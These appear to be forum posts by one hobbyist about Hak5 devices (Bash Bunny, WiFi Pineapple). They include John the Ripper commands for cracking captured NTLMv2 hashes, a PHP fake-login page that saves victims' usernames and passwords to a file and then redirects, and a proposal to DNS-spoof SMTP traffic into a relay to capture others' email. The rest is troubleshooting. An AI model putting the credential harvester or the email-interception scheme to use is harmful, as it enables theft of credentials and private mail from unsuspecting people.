kaiserninja

I found out that my problem was that I was using John the Ripper standard version which can't read the NTLMv2 Hash. You must have the John the Ripper Jumbo version. I could not get it to compile on Ubuntu 16 because of libopenssl being broken but I am a mac user and found a precompiled version of it here http://download.openwall.net/pub/projects/john/contrib/macosx/ On a mac just download this folder and navigate to the /run directory and run the command. No need to compile anything. ./john --format=netntlmv2 "your_hashfile_here.txt" and it will brute force it. Cracked my 4 letter hash I pulled from the bashbunny in about 10 seconds. You could also point it to a dictionary file by appending that to the end of the command like so: ./john --format=netntlmv2 "your_hashfile_here.txt" "your_dictionary_file.txt" If someone has an idea on how to install john the ripper jumbo on Ubuntu that might be helpful to some people here who don't have mac. Also I couldn't use hash cat because it uses the gpu and my laptop has an onboard intel unsupported chip. Hope this helps!

What format are the hashes created in the loot folder? Do I need to convert them to another format for cracking? I lifted my hashes from my windows machine and am trying to use John the ripper to crack it and it says no "passwd hashes loaded".

That did the trick. Been working on this one for days trying to figure it out. Thanks

I am trying to redirect to a webpage in the www directory called 4043error.html that just says wireless service unavailable after the error.php is executed. I have this and it executes all the way down to the part in red. I get a blank web page with no redirect. I don't code php so any help would be appreciated. This is my error.php file. <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("users.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); $loc = '4043error.html'; header("Location: $loc"); die(0); } ?>

Oh yeah, about relaying. You can configure sendmail to send a copy of all emails that it relays to an email account you create such as logmail or whatever you want to name it. It takes some configuring in the mc.conf but I think I can make this work. I get my new MK4 today so I will work on this over the weekend. I have a MK4 that the wireless signal worked only about 5 feet and was past the warranty time to send back. Snubs offered to take it back anyway but after I saw the new elite pack I just ordered a new one and will try to crack open the other and reseat the antenna myself. The hack 5 team is awesome. I will keep you posted on what I come up with.

Smtps on port 553 is encrypted but standard port 25 smtp is not. There are a lot of people who have multiple smtp servers in their settings and if their mail client is unable to connect to their main smtp server they get a choice to use one of the other servers. If they select a standard smtp on port 25 then the redirect would work and the traffic would not be encrypted.

Could you install a mail server such as sendmail and then use dns spoof to forward all smtp requests to your outgoing email open relay mail server. Most smtp servers require you to be assigned an ip address on the corresponding network (i.e. smtp.comcast.net for outgoing email requires you to be using comcast internet service.) Could you spoof all requests for smtp with something like smtp.*.* in dns spoof and forward those requests to your open relay configured smtp server? This would enable you to capture all emails that were being sent from anyone using smtp and not just dedicated network requests. I know that apple's outgoing smtp server is smtp.mail.me.com so this should effectively capture non dedicated network smtp traffic as well. Does this sound possible? Any thoughts?

So I flashed it by copying the files to the /tmp/upgrade.bin and ran the update command from there. I am back and working!!! woo hoo This time I will follow the usb swap directions from here http://forums.hak5.org/index.php?showtopic=25882 The one thing that would have saved me some time is that the usb drive HAS TO BE FORMATTED TO EXT4 for the pineapple to recognize it. Make sure you do that before you try to set it up as a swap drive. Hope this helps

The problem is not copying files to the www directory. I removed the 3 files that I copied and other than that it is exactly like when I set it up. I was running the fstab changes in the usb webpage of the pineapple and I issued the command root@Pineapple:~# mkswap /dev/sda1 instead of root@Pineapple:~# mkswap /dev/sda2 now my /dev/root directory is showing %100 full. I even went to the log files and deleted the karma log file and the device still shows as full! Will flashing the pineapple take it back to factory settings and clear out the damage or is there something easier I can do. Again I am a noob at this so if you need more info just tell me what to do. Thanks

I just got my MKIV today and am a total noob. I copied the rick roll over to the www directory and everything worked fine with dns spoof. I was then trying to get my sandisk usb drive to work and am not sure what I did. When I run the df command I get this root@Pineapple:/# df Filesystem 1K-blocks Used Available Use% Mounted on rootfs 1088 1020 68 94% / /dev/root 5120 5120 0 100% /rom tmpfs 14768 520 14248 4% /tmp tmpfs 512 0 512 0% /dev /dev/mtdblock3 1088 1020 68 94% /overlay overlayfs:/overlay 1088 1020 68 94% / /dev/mtdblock7 5120 5120 0 100% /mnt/mtdblock7 /dev/sda1 3842376 76696 3570492 2% /usb root@Pineapple:/# Obviously my /dev/root is full and I can't even move files or run the cleanup script. Any help on finding out what is filling up the drive would be great.